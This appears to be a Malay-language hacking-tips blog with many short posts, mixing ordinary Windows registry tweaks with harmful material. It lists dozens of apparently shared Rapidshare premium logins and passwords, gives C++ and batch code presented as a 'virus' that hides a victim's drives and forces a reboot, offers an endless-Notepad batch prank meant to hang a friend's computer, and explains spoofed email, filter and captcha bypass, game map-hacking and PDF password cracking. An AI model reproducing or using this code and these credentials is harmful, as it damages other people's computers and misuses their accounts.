Akaun premium rapidshare






Assalamualaikum..

Sini admin nk kongsi id2 premium rapidshare yg dapat admin ambil dari blog2 dan website2.. kah3..
so korang test la sendiri coz admin test ok ja...


LOGIN: 31989
PASSWORD: 2310214
LOGIN: 27766
PASSWORD: 8797341
User: 18549
Password: 4646182
Login: 20145
Password: 7072148
Login: 19159
Password: 7932964
Login: 20151
Password: 773290
Login: 20366
Password: 7177185
Login: 20374
Password: 5630758
Login: 20452
Password: 3249043
LOGIN: 20949
PASSWORD: 2716739
User: 22484
Password: 358030
User: 18549
Password: 4646182
User: 18800
Password: 9496722
LOGIN: 20949
PASSWORD: 2716739
Login: 20145
Password: 7072148
Login: 19159
Password: 7932964
Login: 20151
Password: 773290
Login: 20366
Password: 7177185
Login: 20374
Password: 5630758
Login: 20452
Password: 3249043

Read More - Akaun premium rapidshare

Cara Hack PDF Password secara Percuma




Assalamualaikum..
k hari ni Admin update cara hack fail password pdf.. senang ja.. korang just pegi kt laman web admin bagi dibawah ni pastu korang upload.. ikut instruction k..

Link 1

Link 2


senang kan.. so lepas ni korang bolehlah unlock mana pdf fail secara percuma yep..
selamat mencuba... :)

Read More - Cara Hack PDF Password secara Percuma

Software Radio Online Malaysia Percuma








Assalamualaikum..
Pada kali Ini Admin ade la rajin sikit buat satu software dengar radio secara Online percuma untuk korang nieh kah3.. .. so apa korang tggu lagi??
download la dengar radio.. cuma interface ja hodoh.. kaka.. jgn complain erk.. jnji function dye ok no fail punya.. bawah ni download n Interface dye k.. selamat mendengar radio n jangan lupa like fanpages fb.. :) Nantikan Autoblogwalking dari Admin akan dtg.. free ja Admin kasi.. keh3..





Note: Kalau Korang ada nk suh tambah radio pape tinggal ja la kat komen nnt Admin Update untuk korang.. promosi sikit radio tu walupon simple je.. kah3..

Read More - Software Radio Online Malaysia Percuma

Cara guna Maphack mh Dota




Assalamualaikum..
Wah dengar tajuk atas tu da tau kan bagi gamers Dota .. kah3... sini Admin mahu post Cara Untuk Maphack Dota  .. senang ja.. cuma klu korang men maphack ni ble korang nak pandai kan.. ni untuk newbie2 yang men kt garena  so korang just download  software ni.. run ..


Download


Kepada otai2 Dota tu jangan marah :D just for information.. keh3.. (kot2 otai pon guna benda ni)

Read More - Cara guna Maphack mh Dota

Virus Disable Hard Drive





Salam..
ermm.. hari ni xde pa nak tulis cuma sedikit kerja jahat untuk mengenakan musuh .. kah3.. so pada kali ini Admin kongsi cara untuk disablekan hardrive musuh.. cara nni untuk yang ada C++ compiler k...

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }




Copy kod kt atas dan paste pada notepad Save fail ini dengan nama .cpp extension Compile gunakan c++ dan buat .exe fail.

Cara ke 2

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Kah3 Pc ko kne hack ler!\" -f

ambil kod kt atas ni pastu korang paste dalam notepad.. pastu save apa2 korang suka janji format   .bat

contoh "Hackpensil.bat "  jgn korang tekan double klik plak klu dah simpan... kah3.. merana kang.:D

Admin syorkan guna cara 2 la senang.. .. k.. Selamat mencuba .. keh3.. 

Read More - Virus Disable Hard Drive

Cara buang Virus FB


Assalamualaikum..
hah! virus facebook.. kah3.. mst ramai da kena kn.. ?, :D
Admin xpenah kena lagi tp ramai kawan Admin da kena virus ni.. fungsi virus ni dye akan spam samaada dari chat facebook atau post wall to wall org.. kah3.. sini admin akan paparkan cara buang virus ni k.. korang just ikut step admin ni.. so 
Admin bagi korang 3 cara samaada buang manual ataupon pakai software.. kot korang la mana mudah k..

cara manual 1

Step1> Start>Run> pastu taip c:\windows\system32\drivers\etc
Step2> oraite cari fail nama "host" pastu buka.. pilih notepad 

step3>dalam file "hosts" tadi akan ada satu baris seperti di bawah.CARI BARIS INI: facebook.com 
(CONTOH: “127.0.0.1 http://www.facebook.com” )
 Buang jika ada “127.0.0.1 http://www.facebook.com”Tutup file "hosts" dan save.
Settle.. 
Cara yang ke 2 


Step 1-Start>run>regedit


Step 2- korang ikut ni tengak mana yang admin merahkan tulisan nya delete k..


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run\”systray” = “c:\windows\mstre6.exe”


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run\”systray” = “C:\Windows\fbtre6.exe”


HKEY_CURRENT_USER\AppEvents\Schemes\Apps\Explorer\Navigating;






Cara lagi senang malas nk baca ikut bawah ni

Step1> dowbload link ni pastu install pastu scan settle.. wakaka.. senang ja..



Read More - Cara buang Virus FB

Cara Untuk Download Multiple Rapidshare






Assalamualaikum.. 
Oraite malam ni Admin nak share kat korang cara multiple download rapidshare / megaupload / hotfile dan lain .. senang ja x susah pon.. simple step just download pastu korang install web browser tu.. Biar Admin terang sikit kegunaan benda ni k :) >  Untuk pengetahuan korang apabila kita on browser ni maca proxy browser dimana korang boleh tukar permanently ip address kepada dynamic ip address. kiranya dalam masa yang sama korang mempunyai 2 ipaddress.. hebat kn..? kah3..  yang lagi best Internet download manager (IDM) support browser ni..  wah boleh download rapidshare / megaupload / hotfile dan lain dalam masa yang sama ler.. kui3.. so korang leh test sendri.. link download 







 Selamat mencuba untuk korang :)

Read More - Cara Untuk Download Multiple Rapidshare

Cara Untuk Disable Drive Dalam My Computer






Salam...
haa ni pula Admin mahu Share dengan korang trick2 untuk kita  kenakan org.. best2 kn kenakan orang ni.. dari duka boleh suka kn.. tapi kdang2 dari suka pon leh jadi duka.. kah3..  So apa yang Admin share sini ada untuk disablekan drive dalam my computer.. so ikut step ni 

Step1- klik start->run>regedit

Step2-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Step 3-right click pastu pilih  DWORD namakan dia NoDrives

Step4- oraite korang dah create kan?? so korang modify plak right klik kat situ isikan angka Admin bagi ni
 pada ruang  (Hexadecimal)                                  3FFFFFF  

oraite dapat? so pastu korang pergi ke my computer dan tekan f5 (refresh) ...
haaa kan xde kan..hahaha .. dah hilang.... camna cara nak adakan balik?? korang delete ja file korang create tadi. dan settle masalah .. kah3..  selamat mencuba..   

Read More - Cara Untuk Disable Drive Dalam My Computer

Hack Album Facebook orang .






Assalamualaikum.. dan salam sejahtera..
haha.. lame dah Admin x update kn.. so Admin tgh slow2 la ni nak update post Admin..
so pd kali ini Admin akan kongsikan cara untuk tengok gambar facebook orang lain tanpa add friend dengan diorang... mane la tau ade gambar pelik2 kn!.. haha...  so korang ikut step bawah ni je la.. kah3 xmo menaip byk2.. admin just ambik laman web matsalleh ni ... sebab infi ni Admin tengok penting gak buat Admin..  Selamat mencuba.. :)




Read More - Hack Album Facebook orang .

Cara Mengetahui Yahoo Massengger Online atau Offline





Assalamualaikum...
Kekadang ramai yang tidak tahu yang korang ditipu oleh orang lain menggunakan yahoo massangger dengan menggunakan mode offline.. padahal Anda ditipu???... haha... ala biasa la... bende2 gini.. .. xpa.. Admin ada trick terbaik untuk korang nk mengetahui samaada orang on9 ataupun tidak.. kah3.. senang ja..  yang mana2 otai2 hackker tunpang lalu neh... adik nak share idea dengan kawan2 blogger i.. :)

Step1: tekan ENViroments pastu tekan yahoo tool or Interactive Fun, dan click pada Doodle.

Step2: Kalau xon9 dye akan keluar cam ni








Kalau dye sedan on9 seta menipu anda??? kah33... seperti dibawah..






haa... cara muda dan imple kan... ayat Admin je lebih.. wakaka... xpa..Tambahkan lagi pengetahuan Korang diblog ini... Selamat mencuba...



Read More - Cara Mengetahui Yahoo Massengger Online atau Offline

Cara Mudah Untuk Bypass Laman Yang Diblock


Assalamualaikum...
haaa lame Admin tidak update baru kn.. so pada kali ini Admin update cara simple memasuki mana2 website yang diblok oleh company , sekolah , atau sebagainya.Ramai yang bertanya kepada Admin mengapa tutorial yang admin kongsi tidak menjadi.. tutorial yang lepas dimana Admin kongsi cara unblock laman web yang diblok itu adalah untuk lepasi sekatan yang disekat olek SKMM .So jangan klorang tertukar pulak nanti cara lepasi sekatan SKMM dengan Bypass ... :).. Siple ja cara nya. korang just download software ni

Download :)

oraite.. pastu korang leh surf internet sepuas puasnya... keh3...

Read More - Cara Mudah Untuk Bypass Laman Yang Diblock

Selamat Hari Raya




Assalamualaikum..
dikesempatan ini Admin ingin mengucapkan selamat hari raya aidil fitri kepada semua sahabat2 sama ada blogger ataupun yang kenal .. Admin memohon maaf jika ada tersilap atau terkasar bahasa mahupun sengaja.. kah3..:).. Admin agak kesibukan hari demi hari sehinggakan tidak sempat untuk update blog ini.. walaucamnapun Admin berterima kasih kepada yang menyokong blog admin dari awal sampai ke tahap ini.. walaupun blog Admin tidak sehebat otai2 blogger namun Admin bersyukur sampai ke tahap ini.. Admin akan cuba untuk update latest untuk korang..  sekian.. Selamat hari raya Aidil fitri .. Kpd semua dan terutama kepada Hackers2 di malaysia mahupun luar negara..

Assalamualaikum...

Read More - Selamat Hari Raya

Tengok Cerita Dalam Ms Paint !!




Assalamualaikum..
Seperti biasa Admin share trick kecil.. hehe.. pada kali ini Admin share cara untuk menonton movie dalam
paint... mesti korang ade rasa pelik kan camna nak menonton video dalam Ms Paint. Admin pon plik gak.. kah3... so kita try sama k?... :)

Step 1. Buka apa2 cerita kegemaran korang

Step 2. Pastu korang tekan printscreen jangan tutup atau pause atau stop video tersebut keh3..

Step 3.Buka Ms Paint pastu korang paste kan..

Haa.. nmpakkan wakkakaka....  Selamat mencuba.. :)

Note: Format DivX , Flash movies xdapat play dalam Ms paint

Read More - Tengok Cerita Dalam Ms Paint !!

Buat Windows Vista Boot Laju




Assalamualaikum..
Haa..ramai yang tanya kan cara untuk boot vista laju.. ni serba sedikit nak lajukan boot window vista korang.. so ikut ja step dibawah.


Step 1. Start>run>regedit


Step 2. Ikut seperti dibawah

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters 

Step 3. pastu korang tengok belah kanan double klik EnablePrefetcher pastu korang setkan pada 0.

Step 4. korang cari key ni plak 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Session Manager\Memory Management

Step 5. cari key nama ClearPageFileAtShutdown ..(kalau xde korang buat key baru right klik pastu pilih REG_DWORD bagi nama ClearPageFileAtShutdown setkan pada 0.

Step 6.Cari key ni plak pstu modify WaitToKillServiceTimeout jadikan 1000

HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control

Note: WaitToKillServiceTimeout<---- jangan korang pepandai buat 0.. nanti ade plak data korang yang disave lepas restart tiba2 hilang.. hehe..

tu jela setakat ni.. Nanti klu lembab gak Admin updated lagi.. amalas nak menaip.. keh3.. :)
Selamat mencuba Dan Selamat berpuasa


Read More - Buat Windows Vista Boot Laju

Bersihkan Ram Anda




Assalamualaikum..
Maybe ramai yang mengalami masalah seperti Admin dimana komputer kamu menjadi hang
semasa membuat kerja tidak kira la assigment atau lain2.. So pada kali ini Admin akan share dengan korang serba sedikit cara untuk mengurangkan hang komputer korang. 
buka notepad pastu pastu perkataan dibawah ini

FreeMem=Space(64000000)

pastu save dengan nama hackpensil.vbs  atau dengan nama apa2 sekalipon asalkan ada .vbs dibelakangnya... keh3.. korang test la kalau sangkut gak tukar besar sikit contoh nya

FreeMem=Space(128000000) 


Selamat mencuba... Cheer  

Read More - Bersihkan Ram Anda

Cara MudahTukar Title Comand Prompt




Assalamualaikum...
Hari ni Admin tak nk cerita panjang so Admin terus kepada cara mudah untuk tukar title comand prompt.

Step 1. Start>run>taip cmd
Step 2. Teluar je command prompt tu korang taip macam kt bawah ni
title Hackpensil

bertukar x?? kah3... so korang boleh tukar kan nama hackpensil tu dengan apa2 nama yang korang suka.. so Selamat mencuba.. :D

Read More - Cara MudahTukar Title Comand Prompt

Cara tukar Chatbox Fb Versi Baru kepada Versi Lama





Terima kasih kepada yang memberi info ini kepada Admin
Cara tukar chatbox baru kepada versi lama korang just klik link ini
pastu pilih browser mana yang korang pakai .. pastu ikut arahan..

Selamat mencuba :)

Read More - Cara tukar Chatbox Fb Versi Baru kepada Versi Lama

Hack Tukar Windows Default Program Files Directory


Dalam tutorial kali ini korang akan belajar tentang cara untuk tukar default program file directory.
Admin memikirkan cara untuk membuat default program file yang baru  di partition D. So setiap kali Admin install software baru semua akan masuk ke dalam folder yang Admin buat dengan menukar registry editor tanpa perlu memilih folder secara manual semasa install apa2 software sekalipon.Hebat kan.. kah3.. Caranya seperti dibawah. :)


Step 1. Start>run>regedit

Step 2. haa.. korang carik ikut key yang Admin bagi dibawah ye.. keh3..

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

Step 3. Pastu korang double klik ProgramFilesDir


(Nanti ade popup dari window pastu pepandai la korang taip lokasi  mana korang nak buat
Windows Default Program Files DirectoryContoh gambar dibawah)


Step 4. klik ok pastu restart settle..

Note: Untuk pengetahuan korang cara ini adalah selamat .tetapi risiko tetap atas tanggung jawab sendiri Keh3..


Read More - Hack Tukar Windows Default Program Files Directory

Cara Buat Nombor Matrix



Hari ini Admin nak share info untuk buat no matrix atau dikenali sebagai no random seperti gambar diatas :D
Cara untuk buat random matrix ni sangat mudah korang just ikut apa yang Admin buat.

Step 1. Open Notepad

Step 2. Korang copy code yang Admin bagi dibwah pada notepad yang korang dah buka tadi.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start



Step 3. Next, korang just save dengan nama  Matrix.bat 

Settle.. Selamat mencuba kepada Semua :)

Read More - Cara Buat Nombor Matrix

Mozilla firefox trick




A'kum..
Sebelum Admin mulakan pada hari ini admin mengucapkan selamat menyambut bulan ramadan kepada semua umat islam sama ada di dalam atau di luar negara. pada kali ini Admin akan kongsi trick untuk mozilla firefox .
Korang just try n then korang akan tau apa hasil nya..

copy kod kod dibawah dan paste pada url korang.pilih mana korang mahu.

chrome://global/content/alerts/alert.xul
Firefox akan akan keluar popop pada address bar setip sudut
chrome://browser/content/browser.xul
ia akan buka semua tab pada tab yang ada
chrome://browser/content/preferences/preferences.xul
buka option
chrome://browser/content/bookmarks/bookmarksPanel.xul
url ini akan buka bookmark manager firefox
chrome://browser/content/history/history-panel.xul
buka history tab
chrome://browser/content/preferences/cookies.xul
akan buka cookies yang ada pada firefox korang
chrome://browser/content/preferences/sanitize.xul
url dibawah untuk padam private data
chrome://mozapps/content/extensions/extensions.xul?type=extensions
buka addon dan korang leh manage..
chrome://browser/content/aboutDialog.xul

oraite serba sedikit penjelasan dari Admin.. kalau nak tahu lebih lanjut korang boleh try sendiri.

Selamat berpuasa dan a'kum... :)

Read More - Mozilla firefox trick

Cara Buang Buang Icon Recycle Bin Dekstop





Assalamualaikum..
Pada Kali ini Admin akan share dengan korang cara untuk Buagn recycle bin di dekstop koraang. Mayb pada sesetengah orang tak kesah tentang kewujudan recycle bin di dekstop. tetapi sesetengah orang  Seperti Admin tidak suka akan icon yang ada di dekstop. Admin lebih suka dekstop kosong. :) .

Ikut step Admin ajar ini.
Step 1. Start > Run > Regedit  .

Step 2. Lepas keluar registry korang ikut  apa yang Admin tekan. 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\BitBucket
Step 3. Cari key DWORD value nama NukeOnDelete kalau tidak wujud korang wujudkanlah

Step 4. Setting pada Value Data: [0 = Guna Recycle Bin / 1 = Buang recycle Bin]

haa kalau korang rasa cara atas susah korang ikut la cara dibawah ini pula.. Kah3..

start->run->gpedit.msc-> user configuration ->desktop->remove recycle bin from desktop->double click->tukarkan kepada not configured ke enable->apply dan ok.

Sekarang korag pergi ke Start->run->gpupdate.exe dan Enter

Now korang nye recyclebin sudah kasi licin .. Untuk pengetahuan korang mengurangkan icon pada dekstop boleh menambahkan performance komputer korang.. 

Selamat mencuba dari Admin.


Read More - Cara Buang Buang Icon Recycle Bin Dekstop

Trick Auto Buka Notepad Non Stop







Assalamualaikum...

Sudah sekian lama Admin tidak update tentang prank virus. Seperti yang  korang tau, prank virus adalah sejenis virus yang boleh dibawa bergurau dengan rakan2. so pada kali ini
prank virus yang boleh menakutkan kawan korang adalah auto open notepad. notepad akan terbuka berulang kali sebanyak 100 kali boleh membuat kan komputer seseorang 
hang atau bahasa Terengganunya lekat.. kah3.. :)

Step 1. Buka notepad 

Step 2. copy dan paste kod dibawah ke notepad.

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Korang just save dan simpan dengan apa2 nama sekalipon asal kan nama belakang .bat
contohnya..   "pensil.bat "

Selamat Mencuba !!



Read More - Trick Auto Buka Notepad Non Stop

Cara Hantar Email Palsu




Assalamualaikum..
Haa.. Kali ini Admin akan share dengan korang cara untuk hantar email palsu. Apa itu email palsu? kah3.. email palsu ni adalah email tipu2. xpaham lagi? email tersebut boleh di edit
dari siapa kepada siapa . hebat kan? so korang boleh try sendiri.

Step 1. korang just pergi ke laman web ini klik 
Step 2. korang penuhkan la ape yang diminta di situ.
Step 3. pastu send settle.. mudah ja.. :)

Note: Admin tidak bertanggung jawab jika terjadi apa2 kepada sesiapa pun info yang Admin
share di blog ini hanya untuk menambahkan pengetahuan tentang it :) 

Selamat Mencuba..


Read More - Cara Hantar Email Palsu

Download Rapidshare Tanpa Limit




Assalamualaikum..
Admin akan kongsi trik mudah untuk menyenangkan korang download di Rapidshare
tanpa perlu menunggu 150 mnt .. :) caranya korang just pergi ke 
http://anonymouse.org/anonwww.html  dan paste kan link yang korang nak download
tu di laman web  http://anonymouse.org/anonwww.html. settle selamat mencuba ...

Read More - Download Rapidshare Tanpa Limit

Auto Tutup Non Responding Semasa Shutdown




Assalamualaikum..
Kali ini Admin akan berkongsi dengan korang cara untuk buat window korang tutup nonresponding program semasa shutdown. pasti pengguna windows vista dan 7 banyak mengalami masalah ini. So admin try carik penyelesaian bagi masalah tu.

Step 1. Korang pergi start > run > regedit pastu korang ikut key dibawah

HKEY_USERS\.DEFAULT\Control Panel\Desktop

Step 2. korang cari key value nama 

AutoEndTasks, Jenis: REG_SZ (String Value), Value: (0 = disabled, 1 = enabled).

So korang modify dari "0" kepada "1" paham?

Ada sebarang masalah korang boleh inform Admin tinggalkan komen.
jangan lupa restart selamat mencuba.. cheer :)

Read More - Auto Tutup Non Responding Semasa Shutdown

Cara Untuk Mencari / Download Mp3 Paling mudah




Assalamualaikum...
Admin kongsikan cara untuk download mana2 mp3 dengan mudah pada korang dengan hanya
menggunakan trik google ini.. Mai try :)

Step 1. Korang just masukkan kod dibawah pada search google.

intitle:index.of "mp3" +"Nama lagu" -htm -html -php -asp "Last Modified" 

Korang just tukarkan nama lagu tu kepada lagu yang korang nak cari.
contoh seperti dibawah:


intitle:index.of "mp3" +"kuch kuch hota hai" -htm -html -php -asp "Last Modified"
mudah ja.. korang boleh try sendiri..  selamat mencuba.. :)



Read More - Cara Untuk Mencari / Download Mp3 Paling mudah

Hack Yahoo Messengger Multi Login




Assalamualaikum..
Haa.. best kan bile ade 2 yahoo messenger running dalam 1 masa.. Mayb korang mempunyai 
banyak id yahoo messenger so susah la korang untuk online 2 id dalam 1 masa dengan 
menggunakan 1 komputer kan?? :) Sini ade penyelesaian nya.. korang boleh buat multi login..
ikut step dibawah.

Step 1.
HKEY_CURRENT_ USER\Software\yahoo\ pager\Test. then korang tukar value pada plural seperti dibawah
"Plural"=dword: 00000001
jangan lupa korang restart.. cheer :)

Read More - Hack Yahoo Messengger Multi Login

Chat Menggunakan Lan Network




Assalamualaikum..
Admin agak bz kebelakangan ini serta kesibukan masa. So kali ini Admin akan kongsikan cara untuk chat tanpa perlukan software .Korang hanya perlukan notepad , command prompt dan ip address orang yang korang mahu chat.
so korang ikut langkah dibawah

Step 1. Buka notepad letakkan koding dibawah

@echo off
:A
Cls
echo MESSENGER (http://john-komputer.blogspot.com/)
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

korang save dengan nama "Messenger.bat".

Step 2. Korang double klik pada fail Messenger.bat tu dan ia akan memaparkan
command prompt seperti dibawah



Selepas user korang taip ip address member korang untuk chat. tekan enter

Selepas itu korang dikehendaki menaip mesej yang korang nak send then korang enter.
bawah ialah contoh.:
MESSENGER (http://john-komputer.blogspot.com/)
User: 56.108.104.107
Message: Hi
Senang kan?? kah3.. 

Selamat mencuba..!





Read More - Chat Menggunakan Lan Network

Tambah Kelajuan Shutdown



Pergi start>run taip regedit pastu korang ikut macam dibawah

HKEY_CURRENT_USER\Control Panel\Desktop\

Korang rightclick "WaitToKillAppTimeout" korang modify jadi '1000' 
then korang click ok

Rightclick plak pada "HungAppTimeout" modify jadi '1000' 
then korang click ok 

Korang carik pula yang ini

HKEY_USERS\.DEFAULT\Control Panel\Desktop 

'WaitToKillAppTimeout'   korang modify value jadi "1000"
Pastu klik ok

Cari lagi yang baru dibawah 
'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\' 

WaitToKillServiceTimeout korang ubah jadi "1000"
klik ok.

settle.. selamat mencuba.. 


Read More - Tambah Kelajuan Shutdown

Lajukan Start Menu





Step 1. Korang pergi start>run>regedit.

Step 2. Pastu korang ikut ni HKEY_CURRENT_USER\Control Panel\Desktop\

Step 3. korang pilih "MenuShowDelay"pastu right klik pilih modify dan tukarkan ke 100

Step 4. Kalau korang tidak berpuas hati dengan kelajuan start menu korang leh tukarkan ke 0.

Admin sarankan korang guna 100. ade la sebab2 tertentu Admin sarankan .. 
Selamat mencuba..  Cheer :)

Read More - Lajukan Start Menu

Cara Lajukan Adobe Reader Selaju Notepad






Korang menyampah tak kalau buka Adobe Reader lembab cam siput.. Mesti korang angin kan.? hehe..So pada kali ini Admin akan kongso dengan korang cara untuk buat Adobe Reader korang laju buka macam notepad. kah3.. xcaya?? mai try..


Step 1 . Korang pergi ke tempat folder korang install contoh
 (C:\program file>adobe>acrobat>reader>..... dan lain2.>


Step 2. Korang cut fail dalam  folder "plugin" dan paste ke dalam "optional" directories(ingt cut bukan copy kah3..)


Step 3. Pastikan tutup Adobe kalau tidak korang tidak boleh cut fail tersebut.


Step 5. Sekarang korang open adobe dan rasakan seperti korang buka notepad.. :)


Apa2 masalah korang boleh tinggalkan komen k.

Selamat mencuba..

Read More - Cara Lajukan Adobe Reader Selaju Notepad

Cara Buang Captca ( Word Verification )


Kebiasaan nya kalau korang download2 ade kena tu ggu kan?? So Admin tidak mahu
membuang masa, disini ada addon untuk membuang captca . Pasang Addon ini pada mozilla firefox korang
dan korang boleh download dengan laju tanpa perlu menunggu.

support site.


Download disini

Admin Xsure bende  ni leh pakai or x lagi.. kalau da try bg feedback kt Admin

Read More - Cara Buang Captca ( Word Verification )

Cara Hack Website Dengan Cara Yang Mudah !!!




Maybe korang geram dengan sesetengah website atau blog yang mencopy paste 
entri korang.. so kali ini Admin ajar korang cara hancurkan terus website orang tu dengan sangat mudah. jangan risau tiada risiko . no ip tidak boleh diditect. kah3..
korang pun boleh hancurkan blog Admin kalau korang rasa geram dengan Admin haha..

Cara nya amat mudah

Step 1. korang cari target blog mana korang nk attack.

Step 2. Oraite korang just copy paste javascript dibawah dan paste pada address bar 
laman web tersebut.

javascript:var%20s%20=%20document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://erkie.github.com/asteroids.min.js';void(0);

So hati2 korang kena kawal betul2 bende alah ni bagi btul2 hancur blog or websites
tersbut

Selepas masuk javascript kod tu pada adress bar korang akan nampak 1 bender alah tigasegi.
Cara kawal korang guna huruf pada keyboard w,a,s,d sebagai arrow key untuk control
pastu space untuk korang attak hancurkan web tersebut..
So korang akan rasa puas hati kan.. kah3..


Read More - Cara Hack Website Dengan Cara Yang Mudah !!!